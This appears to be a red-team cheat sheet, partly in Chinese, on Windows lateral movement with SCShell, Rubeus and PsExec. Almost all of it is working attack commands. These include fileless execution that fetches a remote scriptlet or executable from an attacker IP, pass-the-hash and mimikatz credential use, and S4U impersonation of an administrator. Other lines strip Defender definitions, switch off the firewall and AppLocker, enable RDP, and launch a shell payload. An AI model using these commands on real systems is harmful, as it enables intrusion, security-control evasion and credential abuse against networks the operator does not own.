### scshell -> 无文件落地，利用sc以远程服务方式启动 ``` scshell.exe jump09 spoolss "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i:http://192.168.49.57:8080/gvOUbx24m.sct scrobj.dll" . //成功的。 scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c echo 1 > c:/2.txt" . scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c \\192.168.49.57\test\hw.exe" . scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /d 00000001 /f /t REG_DWORD" . scshell.exe file01 SensorService "C:\windows\system32\cmd.exe /c "C:\Program Files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All" . ``` ``` python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde01756 or sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe ``` #### temp ``` Rubeus.exe s4u /user:myComputer1$ /rc4:AA6EAFB522589934A6E5CE92C6438221 /impersonateuser:administrator /msdsspn:CIFS/jump009.ops.compiy.com /ptt PsExec64.exe \\jump009.ops.compiy.com cmd.exe "C:\Program Files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" /v AllowInsecureGuestAuth /d 00000001 /f /t REG_DWORD New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 netsh advfirewall set allprofiles state off sc stop appid sc stop appidsvc sc stop applockerfltr sc.exe config applockerfltr start=demand sc.exe config appid start=demand sc.exe config appidsvc start=demand ``` ### shell ``` PsExec64.exe \\file01 -accepteula "c:\users\public\shell.exe" ``` ### 参考 ``` https://github.com/Mr-Un1k0d3r/SCShell ```